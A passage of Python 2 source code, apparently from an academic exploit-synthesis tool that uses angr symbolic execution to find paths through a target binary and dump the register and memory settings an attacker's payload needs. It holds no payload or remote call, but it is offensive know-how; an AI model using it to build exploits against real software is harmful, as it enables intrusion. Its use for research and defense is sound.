    #       by selecting the exact subpath that will follow. This path however, is just an 
    #       estimation so it may not be correct. Therefore, simulate_edge() quickly generates
    #       candidate subpaths, starting from the shortest one.
    #
    #       simulate_edge() generates PARAMETER_P different subpaths. However, if we let it
    #       generate all possible paths, the result will be the same with the unguided symbolic
    #       execution.
    #
    # :Arg currb: Address of the current basic block
    # :Arg nextb: Address of the basic block that we want to reach
    # :Arg uid: Current UID of the payload
    # :Arg loopback: A boolean indicating whether we should simulate a path or a loop
    # :Ret: If function can extend the path, it returns the basic block path. Otherwise, it returns
    #   None.
    #
    def simulate_edge( self, currb, nextb, uid, loopback=False ):
        dbg_prnt(DBG_LVL_2, "Simulating edge (0x%x, 0x%x) for UID = %d" % (currb, nextb, uid))


        # indicate the boundaries 
#        self.__blk_start = currb
#        self.__blk_end   = currb + ADDR2NODE[currb].size
#
#        print 'BLK START', hex(self.__blk_start)
#        print 'BLK ENDDD', hex(self.__blk_end)


#        for a in self.__imm: print 'self.__imm', hex(a)        

        # Check if current basic block matches with the address of the current state
        if currb != self.__state.addr:              # base check            
            raise Exception('Illegal transition from current state ' 
                        '(starts from 0x%x, but state is at 0x%x)' % (currb, self.__state.addr))

        if loopback and currb != nextb:             # base check
            raise Exception('Loopback mode on distinct blocks')


        # apply any memory reservations (even if currb == nextb)   
        if not self.__mem_RSVPs( self.__state, cur_uid=uid, cur_blk=currb ):
            return None


        # print 'SELF CON', self.__state.se.constraints


        self.__disable_hooks = True
        
        for var in self.FOO:
            # print ' var', str(var)
            if var.shallow_repr() in SYM2ADDR:
                addr, size = SYM2ADDR[var.shallow_repr()]

                MEM = self.__mread(self.__state, SYM2ADDR[var.shallow_repr()][0], 
                                                 SYM2ADDR[var.shallow_repr()][1])

                if "mem_" not in MEM.shallow_repr():
                    self.__init_mem(self.__state, addr, size)
        
                    MEM = self.__mread(self.__state, SYM2ADDR[var.shallow_repr()][0], 
                                                     SYM2ADDR[var.shallow_repr()][1])


               # print 'QQ', SYM2ADDR[var.shallow_repr()], '%%%%', len(var), '==', len(MEM), '|', var, '?', MEM
                
                
                if len(var) != len(MEM):                                    
                    error('Symbolic variable alias found but size is inconsistent. Discard current path...')                    

                # if it's already a concreate value don't add a constraint
                else:
                    # print 'ADD CONSTRAINT FOO', var, MEM
                    self.__state.add_constraints(var == MEM)
                
            else:
                pass
            
        # print 'ok'


        # update immutable register set
        if self.__IR[uid]['type'] == 'regset':
            
            reg = [r for v, r in self.__regmap if v == '__r%d' % self.__IR[uid]['reg']][0]

            dbg_prnt(DBG_LVL_3, "Adding register '%s' to the immutable set." % reg)
            self.__imm_regs.add(reg)


        # ---------------------------------------------------------------------
        # Loopback mode
        # ---------------------------------------------------------------------
        if loopback:
            dbg_prnt(DBG_LVL_2, "Simluation a loop, starting from 0x%x ..." % self.__state.addr)
            
            # guide the symbolic execution: generate P shortest loops
            for length, loop in self.__cfg_sp.k_shortest_loops(currb, uid, PARAMETER_P):

                if length > MAX_ALLOWED_SUBPATH_LEN:    # if loop is too long, discard it
                    # This won't happen as the same check happens inside path.py, but we 
                    # should keep modules independent 

                    dbg_prnt(DBG_LVL_3, "Loop is too big (%d). Discard current path ..." % length)
                    break
            

                mode = [SIM_MODE_FUNCTIONAL] + [SIM_MODE_DISPATCH]*(len(loop)-2) + [SIM_MODE_FUNCTIONAL]

                # if we need to simulate loop multiple times, we unroll current loop by a constant
                # factor
                if SIMULATED_LOOP_ITERATIONS > 2:
                    loop = loop[:-1]*(SIMULATED_LOOP_ITERATIONS-1)
                    mode = mode[:-1]*(SIMULATED_LOOP_ITERATIONS-1)

                # warn('LOOP IS %s' % pretty_list(loop))

                # do the actual symbolic execution and verify that loop is correct
                nextst = self.__simulate_subpath(length, loop, mode)

                if nextst != None:                      # success!
                    emph("Edge successfully simulated.", DBG_LVL_2)

                    del self.__state                    # we don't need current state
                    self.__state = nextst               # update state

                    return loop                         # return subpath
            

        # ---------------------------------------------------------------------
        # Path mode
        # ---------------------------------------------------------------------                    
        else:
            # guide the symbolic execution: generate P shortest paths
            for slen, subpath in self.__cfg_sp.k_shortest_paths(currb, nextb, uid, PARAMETER_P):

                if slen > MAX_ALLOWED_SUBPATH_LEN:      # if subpath is too long, discard it
                    break


                mode = [SIM_MODE_FUNCTIONAL] + [SIM_MODE_DISPATCH]*(len(subpath)-1)

                # do the actual symbolic execution and verify if subpath is correct
                nextst = self.__simulate_subpath(slen, subpath, mode)

                if nextst != None:                      # success!
                    dbg_prnt(DBG_LVL_2, "Edge successfully simulated.")

                    if slen > 0:
                        # print 'unchecked_regsets', self.unchecked_regsets
                        self.__check_regsets(nextst)


                    del self.__state                    # we don't need current state
                    self.__state = nextst               # update state
            
                    return subpath                      # return subpath


                # TODO: !!!
                #   All paths that endup in some loop here get exeuted exactly once. #
                #   It's very hard to follow and simulate > 1 times here. We leave it
                #   as a future work.

        # we cannot simulate this edge. Try another induced subgraph
        dbg_prnt(DBG_LVL_2, "Cannot simulate egde. Discarding current induced subgraph...")
        
        return None                             # no subpath to return


    # ---------------------------------------------------------------------------------------------
    # finalize(): The symbolic variables that are part of the constraints and get overwritten
    #       are concretized during the symbolic execution (__dbg_write_hook). However there are 
    #       other symbolic variables that are part of the constraints, but they don't get
    #       overwritten. This function concretizes symbolic variables left in final staet.
    #
    # :Ret: None.
    #
    def finalize( self ):       
        # ---------------------------------------------------------------------
        # TODO: Having a primitive to set registers may be useless.
        #       Give the option to the attacker to be able to discard solutions
        #       that use apriori registers
        #
        # ---------------------------------------------------------------------
        dbg_prnt(DBG_LVL_0, 'Finalizing Apriori Register Assignments (if any):')

            # for reg, val in self.__reg.iteritems():
            #     # tuples are not part of the constraints and therefore are discarded
            #     if isinstance(val, tuple):
            #         pass

        for reg, symv in self.__inireg.iteritems():           
            
            # check if any of the original register is still in the constraints
            if self.__in_constraints(symv):
                val = self.__state.se.eval(symv)
                self.__inireg[ reg ] = val

                emph('Apriori register found: %s = 0x%x' % (reg, val), DBG_LVL_0)

            else:
                self.__inireg[ reg ] = None

        if self.condreg:
            symv = self.__getreg(self.condreg)           
            print '--------------- CONDREG', self.condreg, symv
            
            if self.__in_constraints(symv):
                val = self.__state.se.eval(symv)
                emph('Conditional register found: %s = 0x%x' % (self.condreg, val), DBG_LVL_0)

                self.condreg = (self.condreg, val)

            else:
                self.condreg = ''                

        # ---------------------------------------------------------------------
        # Concretize leftovers
        # ---------------------------------------------------------------------       
        dbg_prnt(DBG_LVL_2, 'Finalizing %d memory addresses...' % len(self.__mem))

        for addr, val in self.__mem.iteritems():
            dbg_prnt(DBG_LVL_3, 'Inspecting address 0x%x ...' % addr)

            # if __mem[addr] is in the form (value, size), then it's already concretized,
            # so don't take any actions            
            if isinstance(val, tuple):
                continue

            # if address is not concretized already and it's in the symbolic variable set
            if addr in self.__sym and val > 0:
                symv = self.__sym[ addr ]           # get symbolic variable

                if self.__in_constraints(symv):     # if part of the constraints, concretize it
                    realval          = self.__state.se.eval(symv)
                    self.__mem[addr] = (realval, val)

                    emph('\tAddress/Value pair found: *0x%x = 0x%x (%d bytes)' % 
                            (addr, realval, val), DBG_LVL_2)


                    if addr in self.__ext.values():
                        dbg_prnt(DBG_LVL_2, '\tAddress holds an external symbolic variable!')

                else:
                    dbg_prnt(DBG_LVL_3, '\tAddress is not in the constraints.')
                    self.__mem[ addr ] = None           # discard address

            else:
                self.__mem[ addr ] = None           # discard address
                dbg_prnt(DBG_LVL_3, '\tAddress is not needed.')


        # TODO: This case "SYM DICT: 0xd8001000 <BV64 __add__(0xa, r12_562_64, r14_564_64)>"
        # will give wrong results when concretized if r12 is relative

        # for a, b in self.__sym.iteritems():
        #     print 'SYM DICT:', hex(a), b
        

        # ---------------------------------------------------------------------
        # Concretize external input
        # ---------------------------------------------------------------------       
        dbg_prnt(DBG_LVL_0, 'External Input (if any): ')        

        for var, addr in self.__ext.items():                
            dbg_prnt(DBG_LVL_3, "Inspecting external input '%s'" % var.shallow_repr())

            # print var, addr


            # ---------------------------------------------------------------------
            # Some external variables may be part of the constraints, but not
            # written to memory
            # ---------------------------------------------------------------------       
            if addr == EXTERNAL_UNINITIALIZED:
                concr = False


                if self.__in_constraints(var):
                    concr = True
                    ext = var.shallow_repr()

                elif SYMBOLIC_FILENAME in var.shallow_repr():
                    # print 'insize ;)'

                    
                    # check again if it's in the constraints
                    for constraint in self.__state.se.constraints:
                        # treat constraint as an AST and iterate over its leaves
                        for leaf in constraint.recursive_leaf_asts:
                            # we can't compare them directly, so we cast them into strings first
                            # (not a very "clean" way to do that, but it works)
                            if SYMBOLIC_FILENAME in leaf.shallow_repr():
                                concr = True
                                ext = SYMBOLIC_FILENAME

                    
                if concr:
                    value = self.__state.se.eval(var)

                    dbg_prnt(DBG_LVL_3, 'External value (%s) found: 0x%x' % 
                                            (ext, value))

                    self.__ext[ var ] = (addr, value)

                else:
                    dbg_prnt(DBG_LVL_3, 'External value is not needed.')

                continue


            elif addr == None or addr not in self.__sym:
                warn('External symbolic variable is not set')

                del self.__ext[var]
                continue
            
                            
            value = self.__state.se.eval(self.__sym[addr])

             
            dbg_prnt(DBG_LVL_3, 'External value found: 0x%x' % value)

            self.__ext[ var ] = (addr, value)


    # ---------------------------------------------------------------------------------------------
    # step(): This function moves the execution forward by 1 basic block.
    #
    # :Arg stmty: The type of the last statement
    # :Ret: None.
    #
    def step( self, stmt ):
        dbg_prnt(DBG_LVL_2, "Moving one step forward from 0x%x ..." % self.__state.addr)


        # create hte simulation manager object
        simgr = self.__proj.factory.simulation_manager(thing=self.__state)
    

        self.__blk_start = self.__state.addr
        self.__blk_end   = self.__state.addr + ADDR2NODE[self.__state.addr].size

        # print 'BLK START STEP', hex(self.__blk_start)
        # print 'BLK ENDDD STEP', hex(self.__blk_end)


        self.__disable_hooks = False                # enable hooks to capture reads/writes

        # this should throw no exception (it was already successful in absblk.py)
        if stmt['type'] == 'call':
            self.__sim_mode = SIM_MODE_DISPATCH
        else:
            # step is in functional mode ;)
            self.__sim_mode = SIM_MODE_FUNCTIONAL
        try: 


            try:
                node = ADDR2NODE[self.__state.addr]

            except Exception, e:
                node = None

            num_inst = len(node.instruction_addrs) if node is not None else None
            if num_inst:
                simgr.step(num_inst=num_inst)
            else:
                simgr.step()
                

        except Exception, msg:                   
            dbg_prnt(DBG_LVL_3, "Step failed. Exception raised: '%s'" % bolds(str(msg)))
            return -1

        except angr.errors.SimUnsatError:   # un-satisfiable constraints
            dbg_prnt(DBG_LVL_2, "Step constraints were un-satisfiable. Discard current path.")            
            return -1


        dbg_prnt(DBG_LVL_2, "Step simulated successfully.")

        if not simgr.active:
            print 'Stashes', simgr.stashes
            
            dbg_prnt(DBG_LVL_3, "Stop failed (No 'active' stashes)")            

            # We may endup in deadended state if the last block is a retn
            # TODO: Fix that
            return [0xdeadbeef]
            # return -1


        self.__disable_hooks = True                 # disable hooks again
        

        # pick the state (if > 1) with satisfiable constraints
        for state in simgr.active:
            dbg_prnt(DBG_LVL_3, "Checking constraints from state: 0x%x" % state.addr)            

            state_copy = state.copy()
            unchecked = self.unchecked_regsets[:]

            if self.__check_regsets(state_copy):
    
                self.__state = state_copy

                dbg_prnt(DBG_LVL_2, "Done.")
                dbg_arb(DBG_LVL_3, "Constraints: ", self.__state.se.constraints)


                return [state.addr for state in simgr.active]

            del state_copy
            self.unchecked_regsets = unchecked[:]

        return -1
       
    # ---------------------------------------------------------------------------------------------
    # __deepcopy__():
    #
    # :Ret: An identical hardcopy of the current object.
    #
    '''
    def __deepcopy__(self, memo):

        print '__deepcopy__(%s)' % str(memo)
        return simulate(copy.deepcopy(self, memo))

        fatal('return ORM(copy.deepcopy(dict(self)))')
    '''


    # ---------------------------------------------------------------------------------------------
    # clone(): This function clones the current simulation object, once it reaches a conditional
    #       basic block. TODO: elaborate
    #
    # :Arg condreg: The register that is used in the condition (must be symbolic)
    # :Ret: An identical hardcopy of the current object.
    #
    def clone( self, condreg ):
        
        dbg_prnt(DBG_LVL_1, "Cloning current state at 0x%x ..." % self.__state.addr)

        print 'RBX', self.__state.regs.rbx, self.__inireg['rbx'], self.__getreg('rbx')
        

        # TODO: That's a bad way to do it. Nevermind it works.
        if   condreg == 'rax': self.__state.regs.rax = self.__state.se.BVS("cond_rax", 64)                                
        elif condreg == 'rbx': self.__state.regs.rbx = self.__state.se.BVS("cond_rbx", 64)
        elif condreg == 'rcx': self.__state.regs.rcx = self.__state.se.BVS("cond_rcx", 64)
        elif condreg == 'rdx': self.__state.regs.rdx = self.__state.se.BVS("cond_rdx", 64)
        elif condreg == 'rsi': self.__state.regs.rsi = self.__state.se.BVS("cond_rsi", 64)
        elif condreg == 'rdi': self.__state.regs.rdi = self.__state.se.BVS("cond_rdi", 64)
        elif condreg == 'rbp': self.__state.regs.rbp = self.__state.se.BVS("cond_rbp", 64)
        elif condreg == 'r8':  self.__state.regs.r8  = self.__state.se.BVS("cond_r08", 64)
        elif condreg == 'r9':  self.__state.regs.r9  = self.__state.se.BVS("cond_r09", 64)
        elif condreg == 'r10': self.__state.regs.r10 = self.__state.se.BVS("cond_r10", 64)
        elif condreg == 'r11': self.__state.regs.r11 = self.__state.se.BVS("cond_r11", 64)
        elif condreg == 'r12': self.__state.regs.r12 = self.__state.se.BVS("cond_r12", 64)
        elif condreg == 'r13': self.__state.regs.r13 = self.__state.se.BVS("cond_r13", 64)
        elif condreg == 'r14': self.__state.regs.r14 = self.__state.se.BVS("cond_r14", 64)
        elif condreg == 'r15': self.__state.regs.r15 = self.__state.se.BVS("cond_r15", 64)

        self.condreg = condreg
        # self.__inireg[ condreg ] = self.__state.regs.rbx


        state_copy = self.__state.copy()                        

        # create hte simulation manager object
        simgr = self.__proj.factory.simulation_manager(thing=state_copy)
  
        print 'Stashes', simgr.stashes
        print 'Constraints', self.__state.se.constraints

        
        # this should throw no exception (it was already successful in absblk.py)
        simgr.step()

        print 'Stashes', simgr.stashes


        # we should have exactly 2 active stashes
        print simgr.active[0].se.constraints
        print simgr.active[1].se.constraints

        if len(simgr.active) != 2:              
            print simgr.active
            raise Exception('Conditional jump state should have 2 active stashes')
       

        dbg_prnt(DBG_LVL_2, "Done.")
        
        self.entry = self.__state.addr
        newsim = simulate(self.project, self.cfg, self.clobbering, self.adj, self.IR,
                                        self.regmap, self.varmap, self.rsvp, self.entry)
       
        newsim.imm           = copy.deepcopy(self.__imm)
        newsim.sym           = copy.deepcopy(self.__sym)
        newsim.inireg        = copy.deepcopy(self.__inireg)
        newsim.reg           = copy.deepcopy(self.__reg)
        newsim.mem           = copy.deepcopy(self.__mem)
        newsim.ext           = copy.deepcopy(self.__ext)
        newsim.relative      = copy.deepcopy(self.__relative)
        newsim.imm_regs      = copy.deepcopy(self.__imm_regs)
        newsim.FOO           = copy.deepcopy(self.FOO)
        newsim.alloc_size    = copy.deepcopy(self.__alloc_size)
        newsim.state         = self.__state.copy() #copy.deepcopy(self.__state)
        newsim.inireg        = copy.deepcopy(self.__inireg)
        newsim.disable_hooks = copy.deepcopy(self.__disable_hooks)
        newsim.unchecked_regsets = copy.deepcopy(self.unchecked_regsets)

        newsim.copy_locally()

        print 'Constraints', self.__state.se.constraints

    
        self.__state.add_constraints( simgr.active[1].se.constraints[-1] )
        newsim.state.add_constraints( simgr.active[0].se.constraints[-1] )

        del state_copy
        
        return newsim
        # return copy.deepcopy(self)
    
    
    # ---------------------------------------------------------------------------------------------
    # stash_context(): Save current context to a stash.
    #
    # :Ret: None.
    #
    def copy_locally( self ):       
        self.__imm           = self.imm
        self.__sym           = self.sym
        self.__inireg        = self.inireg
        self.__reg           = self.reg
        self.__mem           = self.mem
        self.__ext           = self.ext
        self.__relative      = self.relative
        self.__imm_regs      = self.imm_regs
        # self.FOO             = self.FOO
        self.__alloc_size    = self.alloc_size
        self.__state         = self.state
        self.__disable_hooks = self.disable_hooks

        
        # state will have action to the parent object. We have to readjust them?
        self.__state.inspect.b('mem_write', when=angr.BP_BEFORE, action=self.__dbg_write_hook )
        self.__state.inspect.b('mem_read',  when=angr.BP_BEFORE, action=self.__dbg_read_hook  )  
        self.__state.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__dbg_reg_wr_hook)
        self.__state.inspect.b('symbolic_variable', 
                                            when=angr.BP_AFTER,  action=self.__dbg_symv_hook  )
        self.__state.inspect.b('call',      when=angr.BP_AFTER, action=self.__dbg_call_hook   )
  

    # ---------------------------------------------------------------------------------------------
    # stash_context(): Save current context to a stash.
    #
    # :Ret: None.
    #
    def update_globals( self ):       
        self.imm           = self.__imm
        self.sym           = self.__sym
        self.inireg        = self.__inireg
        self.reg           = self.__reg
        self.mem           = self.__mem
        self.ext           = self.__ext
        self.relative      = self.__relative
        self.imm_regs      = self.__imm_regs
        # self.FOO           = self.FOO
        self.alloc_size    = self.__alloc_size
        self.state         = self.__state
        self.disable_hooks = self.__disable_hooks
          
        
    # ---------------------------------------------------------------------------------------------
    # stash_context(): Save current context to a stash.
    #
    # :Ret: None.
    #      self.__state.inspect.b('mem_write', when=angr.BP_BEFORE, action=self.__dbg_write_hook )  
    def stash_context( self ):       
        self.__stash_imm           = copy.deepcopy(self.__imm)
        self.__stash_sym           = copy.deepcopy(self.__sym)
        self.__stash_inireg        = copy.deepcopy(self.__inireg)
        self.__stash_reg           = copy.deepcopy(self.__reg)
        self.__stash_mem           = copy.deepcopy(self.__mem)
        self.__stash_ext           = copy.deepcopy(self.__ext)
        self.__stash_relative      = copy.deepcopy(self.__relative)
        self.__stash_imm_regs      = copy.deepcopy(self.__imm_regs)
        self.__stash_FOO           = copy.deepcopy(self.FOO)
        self.__stash_alloc_size    = copy.deepcopy(self.__alloc_size)
        self.__stash_state         = self.__state.copy() #copy.deepcopy(self.__state)
        self.__stash_disable_hooks = copy.deepcopy(self.__disable_hooks)
        self.__stash_unchecked_regsets = copy.deepcopy(self.unchecked_regsets)


    # ---------------------------------------------------------------------------------------------
    # drop_context_stash(): Drop context stash.
    #
    # :Ret: None.
    #
    def drop_context_stash( self ):       
        del self.__stash_imm
        del self.__stash_sym 
        del self.__stash_inireg
        del self.__stash_reg
        del self.__stash_mem
        del self.__stash_ext 
        del self.__stash_relative
        del self.__stash_imm_regs
        del self.__stash_FOO
        del self.__stash_alloc_size
        del self.__stash_state 
        del self.__stash_disable_hooks
        del self.__stash_unchecked_regsets 


    # ---------------------------------------------------------------------------------------------
    # unstash_context(): Remove a context from stash and use it.
    #
    # :Ret: None.
    #
    def unstash_context( self ):       
        del self.__imm
        del self.__sym
        del self.__inireg
        del self.__reg
        del self.__mem
        del self.__ext
        del self.__relative
        del self.__imm_regs
        del self.FOO
        del self.__alloc_size
        del self.__state
        del self.__disable_hooks
        del self.unchecked_regsets

        self.__imm           = self.__stash_imm
        self.__sym           = self.__stash_sym 
        self.__inireg        = self.__stash_inireg
        self.__reg           = self.__stash_reg
        self.__mem           = self.__stash_mem
        self.__ext           = self.__stash_ext 
        self.__relative      = self.__stash_relative
        self.__imm_regs      = self.__stash_imm_regs
        self.FOO             = self.__stash_FOO
        self.__alloc_size    = self.__stash_alloc_size
        self.__state         = self.__stash_state 
        self.__disable_hooks = self.__stash_disable_hooks
        self.unchecked_regsets = self.__stash_unchecked_regsets


    # ---------------------------------------------------------------------------------------------
    # constraints(): Get constraints.
    #
    # :Ret: None.
    #
    def constraints( self ):
        return self.__state.se.constraints


    # ---------------------------------------------------------------------------------------------
    # __make_relative(): Make an address relative (if needed).
    #
    # :Arg addr: Current address
    # :Ret: A string with the realtive address.
    #
    def __make_relative( self, addr ):
        '''
        # TODO: breaks for eval/orzhttpd/orzhttpd -s payloads/memrd.spl        
        elif abs(addr - FRAMEPTR_BASE_ADDR) < MAX_BOUND or abs(addr - RSP_BASE_ADDR) < MAX_BOUND:

            if abs(addr - RSP_BASE_ADDR) < abs(addr - FRAMEPTR_BASE_ADDR):

                if addr > RSP_BASE_ADDR:
                    return "($stack + 0x%03x)" % (addr - RSP_BASE_ADDR)
                else:
                    return "($stack - 0x%03x)" % (RSP_BASE_ADDR - addr)

            else:
                if addr > FRAMEPTR_BASE_ADDR:
                    return "($frame + 0x%03x)" % (addr - FRAMEPTR_BASE_ADDR)
                else:
                    return "($frame - 0x%03x)" % (FRAMEPTR_BASE_ADDR - addr)
        '''


        if addr in self.__relative:                 # if in relative table
            return '(' + self.__relative[addr] + ')'

        # frame first
        elif abs(addr - RSP_BASE_ADDR) < MAX_BOUND:
            if addr > RSP_BASE_ADDR:
                return "($stack + 0x%03x)" % (addr - RSP_BASE_ADDR)
            else:
                return "($stack - 0x%03x)" % (RSP_BASE_ADDR - addr)

        elif abs(addr - FRAMEPTR_BASE_ADDR) < MAX_BOUND:
            if addr > FRAMEPTR_BASE_ADDR:
                return "($frame + 0x%03x)" % (addr - FRAMEPTR_BASE_ADDR)
            else:
                return "($frame - 0x%03x)" % (FRAMEPTR_BASE_ADDR - addr)
    
   
        elif abs(addr - POOLVAR_BASE_ADDR) < MAX_BOUND:
            if addr > POOLVAR_BASE_ADDR:
                return "($pool + 0x%03x)" % (addr - POOLVAR_BASE_ADDR)
            else:
                return "($pool - 0x%03x)" % (POOLVAR_BASE_ADDR - addr)
            
        elif POOLVAR_BASE_ADDR <= addr <= POOLVAR_BASE_ADDR + self.__plsz:
            return "($pool + 0x%03x)" % (addr - POOLVAR_BASE_ADDR)


        elif ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:
            return "($alloca + 0x%03x)" % (addr - ALLOCATOR_BASE_ADDR)                    
            
        else:
            return "0x%x" % addr


    # ---------------------------------------------------------------------------------------------
    # __is_relative(): Check if an is relative
    #
    # :Arg addr: Current Address
    # :Ret: True if it's relative. False otherwise.
    #
    def __is_relative( self, addr ):

        if addr in self.__relative:                 # if in relative table
            return True

        elif abs(addr - RSP_BASE_ADDR) < MAX_BOUND:
            return True
        
        elif abs(addr - FRAMEPTR_BASE_ADDR) < MAX_BOUND:
            return True

        elif abs(addr - POOLVAR_BASE_ADDR) < MAX_BOUND:
            return True 

        elif POOLVAR_BASE_ADDR <= addr <= POOLVAR_BASE_ADDR + self.__plsz:
            return True

        elif ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:
            return True
            
        else:
            return False


    # ---------------------------------------------------------------------------------------------
    # dump(): Dump the results of the simulation.
    #
    # :Arg output: The output object
    # :Ret: None.
    #
    def dump( self, output ):
        # for a, b in self.__relative.iteritems():
        #     print 'relative', hex(a), b

        output.newline()
        
        if self.__plsz > 0:
            output.comment('Allocation size is always bigger (it may not needed at all)')
            output.alloc(POOLVAR_NAME, self.__plsz)
            output.newline()


        if self.__alloc_size > 0:
            output.comment('Allocation size is always bigger')
            output.alloc(ALLOCATOR_NAME, self.__alloc_size)
            output.newline()


        # TODO: make sure that there is a single $rbp, $stack, $frame (not 1 per fork)
        output.comment('OPTIONAL!')        
        output.set('$rbp', '$rsp + 0xc00')              # TODO: KEEP ME CONSISTENT!

        output.comment('Stack and frame pointers aliases')
        output.set('$stack', '$rsp')
        output.set('$frame', '$rbp')
        output.newline()


        # ---------------------------------------------------------------------
        # TODO: Having a primitive to set registers may be useless.
        #       Give the option to the attacker to be able to discard solutions
        #       that use apriori registers
        #
        dbg_prnt(DBG_LVL_0, 'Apriori Register Assignments (if any):')

        for reg, val in self.__reg.iteritems():
            # tuples are not part of the constraints and therefore are dfor simu in self.__simstash:iscarded
            if not isinstance(val, tuple):

                dbg_prnt(DBG_LVL_0, '\t%s = 0x%x (DROP)' % (reg, val))
                                
                #output.register(reg, val, comment='(DROP)')
                output.comment('(DROP) %s = %s' % (reg, val))
                #output.register(reg, val)
                #output.newline()

        output.newline()

        for reg, symv in self.__inireg.iteritems():
            # check if any of the original register is still in the constraints
            if symv != None:
                symv = self.__make_relative(symv)

                # print 'OUTPUT:', symv
                output.register(reg, symv)

        
        output.newline()

        if self.condreg and isinstance(self.condreg, tuple):            
            reg, symv = self.condreg
            symv = self.__make_relative(symv)
 
            output.comment('(CONDITIONAL) %s = %s' % (reg, symv))
             

        # ---------------------------------------------------------------------
        dbg_prnt(DBG_LVL_0, 'Memory Addresses for variables (if any):')

        output.newline()

        # variables
        for addr, values in self.__inivar_rel.iteritems():

            displacement = 0

            # check which elements from values are relative addresses
            for val in values:                
                if isinstance(val, str):            # string values are directly packed                    
                    pval = '{' + ', '.join("0x{0:02x}".format(ord(c)) for c in val) + '}'
                    size = len(val)

                else:
                    if not self.__is_relative(val):
                        pval = '{' + ', '.join("0x{0:02x}".format(ord(c)) for c in struct.pack("<Q", val)) + '}'
                    else:
                        pval = self.__make_relative(val)

                    size = 8


                # calculate address (base + offset + displacement)
                paddr = "(%s + 0x%02x)" % (self.__make_relative(addr), displacement)


                displacement += size                # shift inside variable's values
                output.memory(paddr, pval, size)
            

                dbg_prnt(DBG_LVL_0, "\t*%s = %s" % (paddr, pval))


        # ---------------------------------------------------------------------
        dbg_prnt(DBG_LVL_0, 'Other Memory Addresses:')

        output.newline()


        for addr, val in self.__mem.iteritems():
            if isinstance(val, tuple):

                # if val[0] in self.__relative:
                if "0x%x" % val[0] != self.__make_relative(val[0]):
                    # pval = '(' + self.__relative[ val[0] ] + ')'
                    pval = self.__make_relative(val[0])

                else:
                    # cast integer to zero padded hex string
                    x = ("{0:0%dx}" % (val[1] << 1)).format(val[0])

                    # cast string to bytes and change endianess 
                    x = ''.join(reversed(x.decode('hex')))

                    # print string in C-style format
                    pval = '{' + ', '.join("0x{0:02x}".format(ord(c)) for c in x) + '}'
                    #lval = ["0x{0:02x}".format(ord(c)) for c in x]


                paddr = self.__make_relative(addr)                
                #   output.memory(addr, '', addr, lval, op='+')

                for a, b in self.__ext.iteritems():
                    #print '^^^^^^^^^^', a, b, addr
                    if b != EXTERNAL_UNINITIALIZED and addr == b[0]:
                        output.comment('value comes from external input (DROP)')
                        break


                output.memory(paddr, pval, val[1])

                dbg_prnt(DBG_LVL_0, "\t*%s = %s\t# %d bytes" % (paddr, pval, val[1]))


        # ---------------------------------------------------------------------
        dbg_prnt(DBG_LVL_0, 'External Input (if any): ')
        
        # TODO: better variable names
        ext_stdin = { }
        ext_file  = { }
        ext_retn  = { }
        stdin, file, retn = [], [], []


        for var, value in self.__ext.iteritems():
            if value == EXTERNAL_UNINITIALIZED:
                continue
            

            if 'stdin' in var.args[0]:
                ext_stdin[ var.args[0] ] = value

            elif SYMBOLIC_FILENAME in var.args[0]:
                ext_file[ var.args[0] ] = value

            elif 'unconstrained_ret' in var.args[0]:
                ext_retn[ var.args[0].replace("unconstrained_ret___", "") ] = value

        
        for var in sorted(ext_stdin):
            stdin.append('0x%x' % ext_stdin[var][1])

        for var in sorted(ext_file):
            file.append('0x%x' % ext_file[var][1])

        for var in sorted(ext_retn):
            retn.append('%s = 0x%x' % (str(var), ext_retn[var][1]))
        
        dbg_arb(DBG_LVL_0, 'External input (stdin) :', stdin)
        dbg_arb(DBG_LVL_0, 'External input (file)  :', file)
        dbg_arb(DBG_LVL_0, 'External input (return):', retn)


        output.newline()
        output.comment('External input (stdin): %s'  % str(stdin))
        output.comment('External input (%s): %s'     % (SYMBOLIC_FILENAME, str(file)))
        output.comment('External input (return): %s' % str(retn))
        

        # for a,b in self.__relative.iteritems():
        #     print 'ADDR2SYM', hex(a), b


        dbg_prnt(DBG_LVL_0, "pool_base  = 0x%x" % POOLVAR_BASE_ADDR)
        dbg_prnt(DBG_LVL_0, "stack_base = 0x%x" % RSP_BASE_ADDR)
        

# -------------------------------------------------------------------------------------------------